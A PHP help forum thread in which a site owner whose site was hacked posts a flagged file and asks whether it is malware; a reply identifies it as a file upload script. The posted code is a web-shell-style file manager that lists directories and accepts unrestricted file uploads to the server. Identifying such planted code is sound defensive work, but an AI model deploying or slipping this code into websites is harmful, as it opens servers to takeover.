Is this code Malware?

General PHP Help
#1

[php]echo “Path: “.htmlspecialchars($cwd).”

”;
if (!is_writable($cwd)) {
echo “(Not writable)
”;
}
if($_POST[‘p1’] === ‘uploadFile’) {
if(!@move_uploaded_file($_FILES[‘f’][‘tmp_name’], $cwd.$_FILES[‘f’][‘name’]))
echo “Can’t upload!
”;
}

$ls = wscandir($cwd);
echo “”;
foreach ($ls as $f) {
if (is_dir($f)) {
echo “”.$f."";
if (is_writable($cwd.$f)) {
echo “<!-- ‘filename.php’,‘chmod’)”> --!> “;
} else {
echo “<!-- ‘filename.php’,‘chmod’)”> --!> “;
}
echo “
”;
} else {
$files[] = $f;
}
}
foreach ($files as $file) {
echo $file.”
”;
}
echo "




Upload file: ";

function wscandir($cwdir) {
if(function_exists(“scandir”)) {
return scandir($cwdir);
} else {
$cwdh = opendir($cwdir);
while (false !== ($filename = readdir($cwdh)))
$files[] = $filename;
return $files;
}
}[/php]

My site got hacked, and a Scan by Bluehost showed 10 pages of files that they THINK are infected. I can find no malware in most of them. Is this Malware?

#2

It’s a file upload script. So, it may be how someone could access your system and execute malicious files.

Sponsor our Newsletter | Privacy Policy | Terms of Service